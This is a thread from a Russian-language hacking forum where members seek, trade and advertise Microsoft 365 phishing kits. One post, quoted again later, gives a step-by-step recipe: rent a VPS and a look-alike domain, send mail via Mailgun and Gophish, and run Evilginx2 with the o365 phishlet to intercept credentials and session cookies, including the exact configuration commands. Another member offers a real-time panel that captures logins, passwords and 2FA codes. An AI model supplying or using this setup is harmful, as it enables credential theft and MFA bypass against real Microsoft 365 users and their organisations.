Фишинг под Microsoft365

hackerman_228 · 02.10.2020

Кто подскажет, где можно взять/приобрести годный кит с фишингом ms365?

perceptron · 03.10.2020

Скрытый контент для пользователей: hackerman_228, Simba.

hackerman_228 · 05.10.2020

perceptron сказал(а):

Скрытое содержимое

Огромное спасибо, мира, добра, валида тебе)

BankSpace · 03.04.2021

У меня чистая целевая страница office365, дайте мне знать, если она вам понадобится

Barabulya · 08.08.2021

Kanan сказал(а):

А может не будете мертвые темы апать клоуны?

Серьезный ты наш Хокаге, иди дом стереги...

†אָ† · 25.11.2021

Как не удивительно, но тема продолжает жить (хотя вроде живет)

hasthur · 09.12.2021

Относительно дешевый способ)

1. Покупаете VPS;
2. Покупаете домен с хостингом (в записи DNS добавляете subdomains microsoft);
3. Идете на mailgun и верифицируете там свой домен (для отправки писем);
4. На VPS ставите Gophish (для отправки писем) и Evilgnix2 (для перехвата данных и кукис);
5. Поднимаете Gophish;
6. Поднимаете Evilgnix2:
: config domain phishdomain.com; - конфигурация вашего домена
: config ip 'your hosts's ip'; - конфигурация вашего VPS (где запущен Evilgnix2)
: phishlets hostname o365 microsoft.phishdomain.com; - прикручивание фишлета o365 к вашему домену
: phishlets enable o365; - включение фишлета
: lures create o365;
: lures get-url 1(or other ID);

Lipshitz · 11.12.2021

Here's a video course of pretty much what he just explained above. This is not my channel and I don't vouch for him in any way, I just remembered getting this a little while ago and thought it could help people here

Hacker Chatroom

Welcome To Hacker Chatroom 💬 Only English 🚫 No pm without permission 🌸 Do not advertise other links (channel, social media)❗️ ☘️ Do not post inappropriate content 📛 Tag @admin to Report Join @Stock_Predictions for signals 🥷 @CodiedHub

t.me

woodenb0x · 13.05.2022

hasthur сказал(а):

Относительно дешевый способ)

1. Покупаете VPS;
2. Покупаете домен с хостингом (в записи DNS добавляете subdomains microsoft);
3. Идете на mailgun и верифицируете там свой домен (для отправки писем);
4. На VPS ставите Gophish (для отправки писем) и Evilgnix2 (для перехвата данных и кукис);
5. Поднимаете Gophish;
6. Поднимаете Evilgnix2:
: config domain phishdomain.com; - конфигурация вашего домена
: config ip 'your hosts's ip'; - конфигурация вашего VPS (где запущен Evilgnix2)
: phishlets hostname o365 microsoft.phishdomain.com; - прикручивание фишлета o365 к вашему домену
: phishlets enable o365; - включение фишлета
: lures create o365;
: lures get-url 1(or other ID);

А есть ли фишлет универсальный под перехват $username $password ??

expert_kalash · 16.05.2022

Есть реалтайм панель для 365, собирает логин пасс 2фа, юзер инфо.
GIF: https://s6.gifyu.com/images/365.gif

Если нужно обращайтесь.

origiv · 10.06.2022

Spear Phishing on Modern Platforms

Spear phishing is a social engineering activity intended to simulate a realistic attack scenario with the intent of bypassing technical security controls and persuading employees to perform various actions.

www.optiv.com

Полный мануал с установкой o365 evilginx2

Фишинг под Microsoft365

hackerman_228

CD-диск

perceptron

RAID-массив

hackerman_228

CD-диск

BankSpace

@Centurion|Palladium

Barabulya

HDD-drive

Вложения

†אָ†

(L3) cache

hasthur

floppy-диск

Lipshitz

(L3) cache

Hacker Chatroom

woodenb0x

HDD-drive

expert_kalash

Художник

origiv

CD-диск

Spear Phishing on Modern Platforms